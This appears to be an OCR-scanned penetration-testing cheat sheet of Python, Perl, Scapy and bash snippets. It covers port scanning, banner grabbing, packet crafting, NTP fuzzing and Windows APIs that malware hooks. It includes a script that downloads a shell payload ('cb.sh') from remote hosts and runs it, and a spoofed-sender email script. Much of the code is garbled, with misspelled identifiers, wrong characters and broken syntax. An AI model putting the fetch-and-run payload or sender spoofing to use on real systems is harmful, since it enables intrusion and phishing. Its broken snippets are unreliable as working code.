Links
Comment on page

Programming

Programming

Port scanner in python

import socket as sk
for port in range (1, 1024):
try:
s=sk. socket (sk. AF _ INET, sk. SOCK_ STREAM)
s.settimeout(1000)
s. connect ( (' 127. 0. 0. 1 ' , port) )
print '%d:OPEN' % (port)
s.close
except: continue

Generating base64 words in Python

#!/usr/bin/pjthon
import base64
filel=open("pwd.lst","r")
file2=open("b64pwds.lst","w")
for line in file1:
clear= "administrator:"+ str.strip(line)
new= base64.encodestring(clear)
file2.write(new)

Convert Windows registry from hex to ascii in Python

import binascii, sys, string
dataFormatHex = binascii.a2b_hex(sys.argv[1])
output = ""
for char in dataFormatEx:
if char in string.printable: output += char
else: output += "."
print ''\n'' + output

Reading all folder files and searching with regex in Python

import glob, re
for msg in glob.glob('/tmp/.txt'):
filer = open((msg), 'r')
data = file.read()
message= re.findall(r' message (.'?) /message ', data, re.DOTALL)
print "File %s contains %s" % (str(msg), message)
fi1er.c1ose()

Building an encrypted web server with ssl in Python

# Create SSL cert (follow prompts for customization)
openssl req -new -x509 -keyout cert.pem -out cert.pern -days 365 -nodes
#Create httpserver.pj
import BaseHTTPServer, SimpleHTTPServer, ssl
cert="cert.pem"
httpd = BaseHTTPServer.HTTPServer( ('192.168.1.10' ,443),
Simp1eHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap socket(httpd.socket,certflle=cert,server side=True)
httpd.serve_forever()

Web server with Python

python -m SimpleHTTPServer 8080

Sending email in python (* sendmail must be installed)

#!/usr/bin/python
import smtplib, string
import os, time
os.system("/etc/init.d/sendmail start")
time.sleep(4)
HOST = "localhost"
SUBJECT = "Email from spoofed sender"
TEXT = "Message Body"
BODY = string.join( (
"From: %s" % FROH,
"To: %s" % TO,
"Subject: %s" % SUBJECT ,
"",
TEXT
) , "\r\n")
server = smtplib.SMTP(HOST)
server.sendmail(FROM, [TO], BODY)
server. quit ()
time.sleep(4)
os.system("/etc/init.d/sendmail stop")

Get the file from http and run it

#!/usr/bin/python
import urllib2, os
urls = [ "1 1.1.1.1","2.2.2.2"]
port = "80"
payload = "cb.sh"
for url in urls:
u = "http://%s:%s/%s" % (url, port, payload)
try:
r = urllib2.urlopen(u)
wfile = open{"/tmp/cb.sh", "wb")
wfile.write(r.read())
wfile. close ()
break
except: continue
if os.path.exists("/tmp/cb.sh"):
os.system("chmod 700 /tmp/cb.sh")
os. system ( "/tmp/cb. sh")

Receiving the banner in python (* the range of ip and ports and its delay should be specified)

#!/usr/bin/python
import urllib2, sys, time
from optparse import OptionParser
parser = OptionParser()
parser.add option{''-t'', dest=''iprange'', help=''target IP range, i.e.
192.168.1.1-25")
parser.add option(''-p'', dest=''port'',default=''80'',help=''port, default=BO'')
parser.add=option("-d", dest="delay",default=".5",help="delay (in seconds),
default=.5 seconds")
(opts, args) = parser.parse_args()
if opts.iprange is None:
parser.error("you must supply an IP range")
ips = []
headers={}
octets= opts.iprange.split(' .')
start= octets[3] .split('-') [0]
stop = octets [3]. split ( '-' ) [ 1 ]
for i in range(int(start),int(stop)+1):
ips.append('%s.%s.%s.%d' % (octets[O],octets[1] ,octets[2],i))
print '\nScanning IPs: %s\n' % (ips)
for ip in ips:
try:
response= urllib2.urlopen('http://%s:%s' % (ip,opts.port))
headers[ip] = dict(response.info())
except Exception as e:
headers[ip] = "Error: " + str(e)
time.sleep(float(opts.delay))
for header in headers:
try:
print '%s : %s' % (header,headers[header] .get('server'))
except:
print '%s : %s' % (header,headers[header])

Scrapy command

When you craft TCP packets with Scapy, the underlying OS will not recognize the initial SYN packet and will reply with a RST packet. To mitigate this you need to set the following Iptables rule: iptables -A OUTPUT -p tcp –tcp-flags RST RST -j DROP
phrase
Explanation
from scapy.all import *
Loading all scapy libraries
ls ()
List of all protocols
lsc ()
list of all functions
conf
Display and settings
IP(src=RandiP())
Generate random destination IP
Ether(src=RandMAC() I
Generate random destination MAC
ip=IP(src=”1.1.1.1”,dst=”2.2.2.2”)
Change the ip parameter
tcp=TCP(dport=”443”)
Change the tcp parameter
data= “TCP data”
specify the data part
packet=ip/tcp/data
Create ip and tcp package
packet.show()
Show package settings
send(packet,count=1)
send 1 packet to layer 3
sendp(packet,count=2)
Send 2 packets to layer 3
sendpfast(packet)
Send faster with tcpreply
sr(packet)
Send 1 package and get the result
sr1(packet)
Post only one reply
for i in range(0,1000): send (packet·)
Send a set a thousand times
sniff(count=100,iface=eth0)
Listen for hundred packets on eth0

Send icmp message on ipv6

sr ( IPv6 ( src=" ipv6 ", dst="ipv6")/ ICMP ())

udp package and payload

ip=IP(src="ip", dst="ip")
u=UDP(dport=1234, sport=5678)
pay = "my UDP packet"
packet=ip/u/pay
packet.show()
wrpcap ("out.pcap",packet):write to pcap
send(packet)

Ntp fuzzer operation

packet=IP(src="ip" ,dst="ip")/UDP(dport=l23)/fuzz(NTP(version=4,mode=4))

Send message http

from scapy.all import *
# Add iptables rule to block attack box from sending RSTs
# Create web.txt with entire GET/POST packet data
fileweb = open("web.txt",'r')
data = fileweb.read()
ip = IP(dst="ip")
SYN=ip/TCP(rport=RandNum(6000,7000),dport=BO,flags="S",seq=4)
SYNACK = sr1(SYN)
ACK=ip/TCP(sport=SYNACK.dport,dport=BO,flags="A",seq=SYNACK.ack,ack=SYNACK.
seq+l)/data
reply, error = sr(ACK)
print reply.show()

Perl language

Port scanner

use strictly; use IO::Socket;
for($port=0;$port 65535;$port++) {
$remote=IO::Socket::INET-new(
Proto= "tcp",PeerAddr= "127.0.0.1",PeerPort= $port);
if($remote) {print "$port is open\n"); )

regex rules

Law
Explanation
^ start
* Zero or more
+ one or more
?
Zero or one
.
All characters up to
{3} Exactly three
{3,}
Three or more
{3,5}
Three or four or five
{3|5}
Three or five
[345]
Three or four or five
[ ^34]
Apart from three or four
[a-z]
letters a-z
[A-Z]
Letters A-Z
[0-9]
Digits 0-9
\d
Digits
\D
Except for the digit
\w
All A-Z, a-z, 0-9
\W
Except A-Z,a-z,0-9
\s
Empty space (\t\r\n\f)
\S
Except (\t\r\n\f)
reg[ex]
“rege” or “regx”
regex?
'’rege’’ or ‘‘regex’’
regex*
``rege’’ w/ 0 or more x
regex+
``rege’’ w/ 1 or more x
[Rr]egex
'’Regex’’ or ‘‘regex’’
\d{3}
Exactly three digits
\d{ 3,)
Three or more digits
[aeiou]
Each one
(0 [3-9] |1 [0-9]|2 [0-5])
Range 03 to 25

nested extract with bash

#!/bin/bash
RESULT=0
while [ $RESULT -eq 0 ]
do
PASSWORD="PASSWORD"
ZIPFILE="$( ls *.zip )"
unzip -P "$PASSWORD" "$ZIPFILE"
RESULT=$?
echo "Unzipped $ZIPFILE using password $PASSWORD ($RESULT)"
cd flag
done

Some examples of commonly hooked Windows API functions

API
Description
CreateProcess
This API function is used to start a new process. By hooking this function, malware can intercept calls to create new processes and inject its code into them, allowing it to execute in the context of the newly created process.
LoadLibrary/LoadLibraryEx
These functions are used to load dynamic link libraries (DLLs) into a process’s address space. By hooking these functions, malware can inject its code into a target process by loading a malicious DLL.
RegOpenKeyEx/RegCreateKeyEx
These functions are used to access and create registry keys. By hooking these functions, malware can monitor and modify the registry, which can be used to maintain persistence or evade detection.
NtCreateFile/NtOpenFile
These functions are used to create or open files on disk. By hooking these functions, malware can intercept calls to access sensitive files, such as password files or system configuration files.
SendMessage
This function is used to send a message to a window or control in a user interface. By hooking this function, malware can monitor and modify user input, which can be used to steal sensitive information such as login credentials or credit card numbers.
CreateFile
this API is used to create or open a file, and is often hooked to allow malware to hide its own files or open and modify existing files.
RegOpenKeyEx
this API is used to open a registry key, and is often hooked to allow malware to modify or delete registry keys, which can be used for persistence or to disable security software.
InternetConnect
this API is used to connect to a remote server over the internet, and is often hooked to allow malware to communicate with a command and control server.
LoadLibrary
this API is used to load a dynamic link library (DLL) into memory, and is often hooked to allow malware to load its own DLLs or to hijack legitimate DLLs.
SetWindowsHookEx
this API is used to install a hook procedure for a specific system-wide event, such as a keystroke or mouse click, and is often hooked to allow malware to monitor user activity or to inject code into other processes.
CreateFile
used to create or open a file or device object. Hooking this API can allow malware to intercept attempts to access certain files or devices, and potentially modify or redirect those requests.
SetWindowsHookEx
used to set a system-wide or thread-specific hook procedure for certain types of events, such as mouse or keyboard input. Hooking this API can allow malware to monitor or manipulate user input or system behavior.
InternetConnect
used to establish a connection to an FTP, HTTP, or HTTPS server. Hooking this API can allow malware to intercept or modify network traffic, potentially allowing it to steal sensitive information or carry out other malicious actions.
CreateProcessA/W
used to create a new process. Malware can hook this API to inject code into a legitimate process or to hide its presence by running as a child process of a legitimate application.
RegCreateKeyExA/W
used to create a new registry key. Malware can hook this API to create persistence by creating a new registry key that will ensure the malware runs every time the system is started.
GetProcAddress
used to retrieve the address of a function in a DLL module. Malware can hook this API to hide its presence by preventing security software from detecting the functions it is using.
InternetConnectA/W
used to connect to an FTP, HTTP, or HTTPS server. Malware can hook this API to steal sensitive data such as passwords and login credentials.
NtQuerySystemInformation
used to retrieve system information such as running processes and drivers. Malware can hook this API to hide its presence by preventing security software from detecting its processes and drivers.
NtQuerySystemInformation
this API is commonly hooked by malware to hide its processes and drivers, making it more difficult for security software to detect its presence on the system.